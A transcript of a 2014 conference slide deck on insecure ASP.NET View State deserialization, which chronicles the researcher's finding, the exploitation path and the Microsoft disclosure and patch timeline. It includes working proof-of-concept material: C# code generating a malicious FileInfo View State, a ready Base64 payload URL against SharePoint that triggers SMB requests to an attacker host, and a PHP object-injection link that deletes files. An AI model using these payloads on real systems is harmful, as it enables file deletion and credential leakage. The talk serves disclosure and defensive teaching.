SlideShare a Scribd company logo
1 of 51
Download to read offline
Application Security Forum - 2014 Western Switzerland 
05-06 November 2014 - Y-Parc / Yverdon-les-Bains 
http://www.appsec-forum.ch 
Why .NET needs MACs and other serial(-ization) tales 
Alexandre Herzog 
CTO / Compass Security Schweiz AG
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
2
About the tale 
It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. 
I won’t cover the disclosure process in detail 
•Not that I don’t want to, but I don’t have time for it 
•Feel free to come over and discuss this afterwards 
–Idéalement autour d’un verre de vin ;-) 
3
About its storyteller 
Vaudois exilé d’abord en Valais, then Wellington (New Zealand) und jetzt Zürich 
Breaking stuff since 2010 for Compass Security 
•Previously worked for banks as sysadmin / developer 
Finished my MAS in Information Security in 2013 
•MAS thesis about “Crypto-based security mechanisms in Windows and .NET” 
Author of several security advisories 
•And still no Twitter handle (!) 
4
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
5
Once upon a time… 
September 2012, 
•during a standard ASP.NET web application assessment… 
<body> 
<form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> 
<div> 
<input type="hidden" […] value="" /> 
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> 
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> 
<input type="hidden" name="__VSTATE" id="__VSTATE" 
value="[LONG_BASE64_STRING]" /> 
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> 
</div> 
6
Once upon a time… 
September 2012, 
•during a standard ASP.NET web application assessment… 
<body> 
<form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> 
<div> 
<input type="hidden" […] value="" /> 
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> 
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> 
<input type="hidden" name="__VSTATE" id="__VSTATE" 
value="[LONG_BASE64_STRING]" /> 
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> 
</div> 
7
Once upon a time… 
protected override object LoadPageStateFromPersistenceMedium() { 
string viewState = Request.Form["__VSTATE"]; 
byte[] bytes = Convert.FromBase64String(viewState); 
if (Helper.obterFlagCompressViewState()) 
bytes = Compressor.Decompress(bytes); 
LosFormatter formatter = new LosFormatter(); 
return formatter.Deserialize(Convert.ToBase64String(bytes)); 
} 
protected override void SavePageStateToPersistenceMedium(object viewState){ 
LosFormatter formatter = new LosFormatter(); 
StringWriter writer = new StringWriter(); 
formatter.Serialize(writer, viewState); 
string viewStateString = writer.ToString(); 
byte[] bytes = Convert.FromBase64String(viewStateString); 
if (Helper.obterFlagCompressViewState()) 
bytes = Compressor.Compress(bytes); 
x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); 
} 
8
Once upon a time… 
protected override object LoadPageStateFromPersistenceMedium() { 
string viewState = Request.Form["__VSTATE"]; 
byte[] bytes = Convert.FromBase64String(viewState); 
if (Helper.obterFlagCompressViewState()) 
bytes = Compressor.Decompress(bytes); 
LosFormatter formatter = new LosFormatter(); 
return formatter.Deserialize(Convert.ToBase64String(bytes)); 
} 
protected override void SavePageStateToPersistenceMedium(object viewState){ 
LosFormatter formatter = new LosFormatter(); 
StringWriter writer = new StringWriter(); 
formatter.Serialize(writer, viewState); 
string viewStateString = writer.ToString(); 
byte[] bytes = Convert.FromBase64String(viewStateString); 
if (Helper.obterFlagCompressViewState()) 
bytes = Compressor.Compress(bytes); 
x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); 
} 
9
Once upon a time… 
We have 
•A custom implementation of the __VIEWSTATE field 
•Its value is stored compressed within __VSTATE 
•It uses the default LosFormatter object constructor 
•No Machine Authentication (sic) Code (MAC) is used 
•The __VIEWSTATE field sent to the client is therefore not integrity-protected 
–Despite the fact we serialize / deserialize objects… 
The same applies to regular ASP.NET pages 
•If property EnableViewStateMac is disabled (enabled by default) 
10
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
11
Tales “Why does .NET need MACs” 
A View State Contains 
•2 bytes of header data (ASP.NET 1.1 versus 2.0+) 
•A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) 
•A (H)MAC ensuring integrity (if configured so – default: enabled) 
A View State 
•Can be encrypted 
•Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) 
•Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 
12
Tales “Why does .NET need MACs” 
View State handling and lifecycle 
13 
ASP.NET deserializes the View State and copies the values back into the controls 
Serialize 
Deserialize 
Request from the client comes in 
Response is sent to the client
Tales “Why does .NET need MACs” 
State of the art of hacking View States back then: 
Trustwave's SpiderLabs Security Advisory TWSL2010-001: 
Multiplatform View State Tampering Vulnerabilities 
Published: 2010-02-08 Version: 1.1 
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. 
Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 
14
15
Tales “Why does .NET need MACs” 
Inappropriate Microsoft advice back then (Trustwave): 
16
Tales “Why does .NET need MACs” 
State of the art of exploiting ASP.NET View State fields without MACs: 
•Abuse them for XSS 
•You must have an existing control on the page accepting HTML to inject your payload 
Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language 
•Implemented in their “Deface” tool 
•This attack was presented in MISC magazine #69 
17
Tales “Why does .NET need MACs” 
Back to September 2012: so ASP.NET unprotected View State fields can be misused 
•But “only” for XSS when a few pre-conditions are met 
•And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) 
Some pages in e.g. SharePoint do not enforce a MAC on the View State 
•View State on these pages is empty, so you can’t misused them for XSS 
18
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
19
“Serialization” tales 
Serialization is known to be an issue in web apps 
•Potentially user defined content gets deserialized on the server 
•Depends on the technology and the application’s code 
•Tool “Deface” targets Apache MyFaces 1.2.8 applications 
Let’s see a PHP example: 
20
“Serialization” tales 
class Example1 
{ 
public $cache_file; 
function __construct() 
{ 
// some PHP code... 
} 
function __destruct() 
{ 
$file = "/var/www/cache/tmp/{$this->cache_file}"; 
if (file_exists($file)) @unlink($file); 
} 
} 
// some PHP code... 
$user_data = unserialize($_GET['data']); 
// some PHP code... 
21
“Serialization” tales 
Flaw can be exploited with the following link 
•http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10: "cache_file";s:15:"../../index.php";} 
When receiving this request, the server 
•Takes GET parameter “data” and “unserialize” it 
•Casts it to object type “Example1” 
•Assigns value “../../index.php” to property “cache_file” 
•When the page lifetime is over, method “__destruct()” of object “Example1” is called which deletes the file 
Can the same be done with .NET? 
22
23
“Serialization” tales 
Great research of James Forshaw (Context) 
Studying (and exploiting) .NET serialization via 
•IFormatter 
•XML Serialization 
•WCF Data Contracts 
•JSON 
But not a word about serialization of 
•View State field 
•LosFormatter object (limited object serialization) 
24
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object TempFileCollection deletes files in destructor 
[Serializable] 
public class TempFileCollection 
{ 
private Hashtable files; // Deserialized list of files 
// Other stuff... 
~TempFileCollection() 
{ 
foreach (string file in files.Keys) 
{ 
File.Delete(file); // Makes sure to delete them when 
// The object is destroyed! 
} 
} 
} 
25
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object FileInfo triggers SMB requests 
[Serializable] 
public class FileInfo { 
private string FullPath; 
protected FileInfo(SerializationInfo info, 
StreamingContext context) { 
// Ensures path is canonical 
FullPath = NormalizePath(info.GetString("FullPath")); 
} } 
string NormalizePath(string path) { 
string[] parts = path.Split(''); 
foreach(string part in parts) { 
currPath += "" + part; 
if(part[0] == '~') { // If potential short path, 
GetLongPathName(currPath); } // call Windows API 
} } 
26
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
27
When the stories come together – My tale 
What if I can combine the fact I now have 
•A View State field without integrity protection (resp. MAC) 
•Known .NET objects having interesting (de)serialization actions 
If possible, I would be able to e.g. 
•Delete a file on the server 
•Get the server to initiate a SMB request to e.g. the attacker’s machine 
Can I apply it? 
Can it be done within the few hours left onsite? 
28
When the stories come together – My tale 
using System; using System.IO; using System.Text; using System.Web.UI; 
// created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 
public class ExploitViewstate 
{ // Caution: both files must be the same length! 
static String bugusFile = @"ATTACKER~testtext.txt"; 
static String dummyFile = @"c:testCompasstestVS.txt"; 
public static void Main(string[] args) { 
String validViewstate = GenerateValidViewstate(); 
Console.WriteLine("Valid viewstate: {0}", validViewstate); } 
private static String GenerateValidViewstate() { 
FileInfo fi = new FileInfo(dummyFile); 
LosFormatter los = new LosFormatter(); 
using (StringWriter sw = new StringWriter()) { 
los.Serialize(sw, fi); 
return sw.ToString(); } } } 
29
When the stories come together – My tale 
C:>set csc=c:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe 
C:>%csc% exploitViewstate.cs && exploitViewstate.exe 
Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 
for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 
Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. 
Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI 
AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= 
For the PoC, we need to change the file in the above Base64 string from 
•c:testCompasstestVS.txt 
to 
•ATTACKER~testtext.txt 
30
When the stories come together – My tale 
On an unpatched SharePoint, just send the following request: 
•http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 
31
When the stories come together – My tale 
On an unpatched SharePoint, just send the following request: 
•http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 
32
When the stories come together – My tale 
In the SharePoint logs: 
09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAA AAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) 
[…] 
09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5- 6190-481e-8b21-c2cb5d04222b 
33
When the stories come together – My tale 
Demo! 
When the View State MAC is disabled, you can 
•Delete a file on the server (via object TempFileCollection) 
•Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) 
•I wasn’t able to get a generic remote code execution (so far) 
–Highly dependent on the application / content of the server’s GAC 
–But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 
34
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
35
Time sequence of the (patch) battle 
Disclosure milestones 
•26.09.2012 Initial contact with MSRC 
•19.02.2013 Microsoft aims for a fix in SharePoint in May 
•28.02.2013 Microsoft confirms work is under way for SkyDrive 
•15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC 
•03.07.2013 Patch again postponed (issues found during tests) 
•16.08.2013 Detailed answer about the next steps; BlueHat invitation 
•10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 
36
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•06.11.2013 Conference call with Microsoft 
•10.12.2013 December’s patch Tuesday with 
–MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) 
–MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) 
–KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) 
•11.12.2013 Meeting with several Microsoft people in Seattle 
37
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•05.05.2014 Release of ASP.NET 4.5.2 which forbids disabling the View State MAC 
•13.05.2014 May’s patch Tuesday with MS14-024 (SharePoint) 
•07.08.2014 Announcement that only the latest (ASP).NET framework will be supported in 2016 onward 
•09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 
You are now safe… … if you install all suggested WU patches 
38
Time sequence of the (patch) battle 
But what was the content of 
•MS13-100 / CVE-2013-5059 
•MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) 
Microsoft did their homework 
•A cross-product/company wide effort was made to address serialisation / View State issues 
•Several additional attack vectors were found and fixed 
39
Time sequence of the (patch) battle 
Extract of MS13-100 (CVE-2013-5059) 
•New namespace “Microsoft.Office.Server.Security” 
•New internal class SafeSerialization with methods 
»IsSafeBinaryFormatterStreamWithAllowList([…]) […] 
»IsSafeBinaryFormatterStreamCommon( […]) 
•Usage within SharePoint: 
40
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
41
Is the ugly bug really dead? 
Yes if you patch adequately 
•No pages in SharePoint should be vulnerable 
•No pages in Outlook Web Access should be vulnerable 
•Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed 
This patch securing the Viewstate is controversial 
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” 
But how is the MAC computed? 
•Using the keys defined in <machineKey /> 
42
Is the ugly bug really dead? 
Yes if you patch adequately 
•No pages in SharePoint should be vulnerable 
•No pages in Outlook Web Access should be vulnerable 
•Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed 
This patch securing the Viewstate is controversial 
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” 
But how is the MAC computed? 
•Using the keys defined in <machineKey /> 
43
Is the ugly bug really dead? 
Result of an audit searching for static machineKey entries 
44
Is the ugly bug really dead? 
If I have your machineKey… 
•… I can generate a valid View State MAC too 
•Well, I can also generate a Forms Authentication cookie among other things… 
Issue was formally reported to Microsoft in August 2013 
•Microsoft took contact with the affected projects 
How do you manage your machineKeys? 
45
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
46
The (happy?) end 
Ensure your products are patched / unaffected 
•SharePoint (MS13-067 & MS13-100) 
•Exchange (OWA – MS13-0105) 
•ASP.NET (KB2905247) 
•All your other third party ASP.NET sites 
If you don’t use ASP.NET 4.5.2 yet 
•Plan to support this version as Microsoft will drop support for elderly version in 2016 
47
The (happy?) end 
Verify your ASP.NET applications 
•Don’t deserialize untrusted documents (e.g. on file uploads) 
•Don’t re-implement custom Viewstate-like features 
Ensure you manage your machineKeys correctly 
•If static keys are defined, manage them as carefully as all the other crypto-stuff 
•No copy/paste from Internet, dedicated keys per environment, … 
•Encrypt the sensitive sections of your web.config 
48
Questions? 
49
Merci/Thank you! 
Contact: 
alexandre.herzog@csnc.ch 
Blog http://blog.csnc.ch/ 
LinkedIn http://ch.linkedin.com/in/alexandreherzog/ 
G+ https://plus.google.com/u/1/109572456864701444940/ 
Slides: 
http://slideshare.net/ASF-WS/presentations 
http://appsec-forum.ch 
50
References 
Understanding ASP.NET View State http://msdn.microsoft.com/en-us/library/ms972976.aspx 
Beware of Serialized GUI Objects Bearing Data https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC- 2010-Byrne-SGUI-slides.pdf 
OWASP - PHP Object Injection https://www.owasp.org/index.php/PHP_Object_Injection 
Are you my Type? https://media.blackhat.com/bh-us- 12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf 
Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45) http://vimeo.com/108438465 
Moving to the .NET Framework 4.5.2 http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net- framework-4-5-2.aspx 
Farewell, EnableViewStateMac! http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell- enableviewstatemac.aspx 
51

More Related Content

What's hot

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Java Thread Synchronization
Java Thread SynchronizationJava Thread Synchronization
Java Thread SynchronizationBenj Del Mundo
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
 
Introduction to Javascript
Introduction to JavascriptIntroduction to Javascript
Introduction to JavascriptAmit Tyagi
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideAlienVault
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 

What's hot (20)

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Js scope
Js scopeJs scope
Js scope
 
Mod security
Mod securityMod security
Mod security
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
Ssrf
SsrfSsrf
Ssrf
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Java Thread Synchronization
Java Thread SynchronizationJava Thread Synchronization
Java Thread Synchronization
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
JQuery introduction
JQuery introductionJQuery introduction
JQuery introduction
 
AEM - Client Libraries
AEM - Client LibrariesAEM - Client Libraries
AEM - Client Libraries
 
Introduction to Javascript
Introduction to JavascriptIntroduction to Javascript
Introduction to Javascript
 
File handling
File handlingFile handling
File handling
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's Guide
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
 

Similar to Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...SPTechCon
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWAREFIWARE
 
Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Maarten Balliauw
 
Spring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundrySpring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundryJoshua Long
 
A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom Joshua Long
 
Struts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web ApplicationsStruts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web Applicationselliando dias
 
Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Visug
 
Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Maarten Balliauw
 
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)Daniel Bryant
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
GWT Web Socket and data serialization
GWT Web Socket and data serializationGWT Web Socket and data serialization
GWT Web Socket and data serializationGWTcon
 
Adventures in Multithreaded Core Data
Adventures in Multithreaded Core DataAdventures in Multithreaded Core Data
Adventures in Multithreaded Core DataInferis
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebJames Rakich
 
Multi Client Development with Spring
Multi Client Development with SpringMulti Client Development with Spring
Multi Client Development with SpringJoshua Long
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and moreYan Shi
 
Web app and more
Web app and moreWeb app and more
Web app and morefaming su
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVCAlive Kuo
 

Similar to Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0 (20)

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWARE
 
Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...
 
Spring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundrySpring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud Foundry
 
A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom
 
Struts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web ApplicationsStruts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web Applications
 
Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)
 
Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...
 
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
 
Always on! Or not?
Always on! Or not?Always on! Or not?
Always on! Or not?
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
GWT Web Socket and data serialization
GWT Web Socket and data serializationGWT Web Socket and data serialization
GWT Web Socket and data serialization
 
Adventures in Multithreaded Core Data
Adventures in Multithreaded Core DataAdventures in Multithreaded Core Data
Adventures in Multithreaded Core Data
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Azure and Umbraco CMS
Azure and Umbraco CMSAzure and Umbraco CMS
Azure and Umbraco CMS
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the Web
 
Multi Client Development with Spring
Multi Client Development with SpringMulti Client Development with Spring
Multi Client Development with Spring
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and more
 
Web app and more
Web app and moreWeb app and more
Web app and more
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC
 

More from Cyber Security Alliance

Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
